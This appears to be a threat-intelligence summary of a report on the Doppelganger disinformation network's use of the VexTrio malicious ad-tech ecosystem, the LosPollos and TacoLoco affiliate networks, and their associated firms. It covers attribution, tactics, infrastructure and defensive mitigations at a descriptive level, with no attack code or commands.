Full Report
Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.
Analysis Summary
# Threat Actor: Doppelganger / VexTrio-Affiliated Actors
## Attribution & Identity
* **Primary Mentioned Operation:** Doppelganger (Disinformation Network)
* **Associated Ecosystem:** VexTrio (Thought to be the oldest malicious Traffic Distribution System (TDS) in existence).
* **Infrastructure/Monetization Operators:** Adspro Group (Registered in the Czech Republic and Russia).
* **Key Individuals/Entities:** Guilio Vitorrio Leonardo Cerutti (Owner of Teknology SA and CEO of Holacode).
* **Associated Firms:** ByteCore AG, SkyForge Digital AG (Swiss firms whose content is copyrighted by LosPollos/TacoLoco).
* **Development Firm:** Holacode (Developed apps like LosPollos and TacoLoco).
## Activity Summary
* **Doppelganger:** A Kremlin-backed disinformation network identified in November 2024 promoting pro-Russian narratives and infiltrating Europe’s media landscape by pushing fake news through cloned websites.
* **VexTrio Ecosystem:** Operates a sprawling ecosystem of malicious advertising technology used by online hucksters and website hackers, managing web traffic from victims of phishing, malware, and social engineering scams.
* **Monetization Networks:** Utilizes the LosPollos[.]com and TacoLoco[.]co affiliate marketing services to drive traffic into the VexTrio TDS.
* **Traffic Redirection:** Nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks, leading to scams, malware delivery, and push notification spam.
## Tactics, Techniques & Procedures
* **Domain Cloaking:** Doppelganger relies on a sophisticated domain cloaking service to present different content to search engines than to regular visitors, aiding persistence.
* **Traffic Redirection Chain:** Uses specialized links to bounce visitors through a long series of domains (starting with a Swiss ISP) before serving content.
* **Malicious Advertising/Smartlinks:** Uses JavaScript-heavy "smartlinks" distributed via affiliate networks (like LosPollos) that push traffic into the VexTrio TDS.
* **Website Compromise:** Affiliates stitch smart links into compromised **WordPress** websites exploiting known vulnerabilities.
* **Deceptive Push Notifications:** TacoLoco deceives users into enabling push notifications by disguising the approval request as a "CAPTCHA" challenge.
* **Monetization Lures:** Traffic is distributed toward dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams, and malware download sites.
## Targeting
* **Sectors:** Media (via disinformation campaigns), general consumers/users visiting compromised websites (via scams and malware).
* **Geography:** Europe (specific focus for Doppelganger misinformation), Global (due to compromised websites and VexTrio reach).
* **Victims:** Internet users targeted by scams, consumers losing money to information stealers, and entities hosting compromised WordPress sites.
## Tools & Infrastructure
* **Malware Families Used:** Information stealers and various malware are delivered via the VexTrio pathway.
* **Traffic Distribution Systems (TDS):** VexTrio.
* **Malicious Ad Networks:** LosPollos[.]com, TacoLoco[.]co.
* **Infrastructure Hosting:** Hosting provider C41 (Switzerland), Teknology SA (Switzerland).
* **Delivery Mechanism:** WordPress exploitation, "smartlinks."
* **Service Misdirection:** Development of anti-scam/VPN apps (e.g., Spamshield) by Holacode potentially masks illicit activities.
## Implications
This represents a convergence between state-backed influence operations (Doppelganger) and large-scale, profit-driven criminal infrastructure (VexTrio, LosPollos). The resilience and incestuous nature of the dark ad tech ecosystem, controlled primarily by Russian organized crime elements, poses a massive, pervasive threat capable of delivering high volumes of scams and malware globally.
## Mitigations
* **Restrict Push Notifications:** Be extremely sparing when approving site notifications; configure browsers to block new notification requests entirely (specific steps provided for Firefox, Chrome, and Safari).
* **Endpoint Security:** Maintain strong defenses against information stealers and malware delivered through potentially compromised websites.
* **Patch Management:** Ensure WordPress installations and plugins are frequently patched to prevent vulnerability exploitation used for injecting smart links.